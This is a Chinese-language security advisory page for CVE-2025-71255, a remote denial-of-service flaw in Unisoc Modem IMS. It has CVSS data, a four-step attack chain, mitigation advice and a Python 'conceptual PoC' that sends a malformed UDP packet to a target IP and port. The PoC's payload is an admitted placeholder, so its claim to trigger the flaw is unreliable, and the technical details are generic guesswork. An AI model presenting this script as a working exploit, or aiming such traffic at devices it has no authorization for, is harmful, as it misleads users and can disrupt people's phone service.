CVE-2025-71255 CVSS 7.5 高危

CVE-2025-71255 Modem IMS远程拒绝服务漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-71255

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Unisoc Modem IMS

漏洞概述

CVE-2025-71255是Unisoc Modem IMS组件中发现的一个高危漏洞。该漏洞源于Modem IMS在处理输入数据时存在不当验证问题。未经授权的攻击者可通过网络向量利用此漏洞，无需用户交互或额外执行权限，即可导致目标设备发生远程拒绝服务，从而中断通信服务。

技术细节

该漏洞的核心在于Unisoc Modem的IMS（IP多媒体子系统）模块未能正确验证传入的网络数据包。IMS协议栈负责处理多媒体会话信令，当接收到特制的畸形数据包或异常信令消息时，由于缺乏必要的边界检查或格式校验，解析逻辑会进入错误状态。攻击者可以通过发送精心构造的数据包触发此逻辑错误，导致Modem进程崩溃、缓冲区溢出或设备重启。由于攻击向量为网络（AV:N），且无需认证（PR:N），该漏洞可被远程利用，对移动设备的基带通信造成严重破坏。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别运行受影响Unisoc芯片组的设备及其开放的IMS服务端口。

STEP 2

载荷构造

分析Modem IMS的输入验证逻辑，构造能够绕过基础检查但导致解析异常的畸形数据包。

STEP 3

漏洞利用

通过网络向目标设备的IMS端口发送特制的恶意数据包。

STEP 4

影响达成

目标设备的Modem在处理数据包时崩溃或重启，导致语音通话及数据服务中断（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# This is a conceptual PoC for CVE-2025-71255
# Actual packet structure depends on the specific IMS vulnerability trigger.

import socket
import sys

def send_ims_dos_packet(target_ip, target_port):
    try:
        # Create a raw socket (requires root privileges)
        # or standard UDP/TCP socket depending on the transport layer used by IMS
        # Assuming UDP for SIP/IMS signaling on a common port
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        
        # Malformed payload designed to trigger input validation failure
        # This is a placeholder for the actual trigger pattern
        malformed_payload = b"\x00\x01\x02\x03" + b"\x41" * 1000 + b"TRIGGER_CRASH"
        
        print(f"[*] Sending malformed packet to {target_ip}:{target_port}")
        sock.sendto(malformed_payload, (target_ip, target_port))
        print("[+] Packet sent successfully.")
        
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python cve_2025_71255_poc.py <target_ip> <target_port>")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])
    send_ims_dos_packet(target_ip, target_port)

影响范围

Unisoc Modem 固件 (具体受影响版本请参考Unisoc官方安全公告)

防御指南

临时缓解措施

在无法立即更新固件的情况下，建议用户在非必要场景下禁用IMS功能（如VoWiFi/VoLTE），或通过运营商侧部署信令防火墙过滤异常流量，以降低被攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表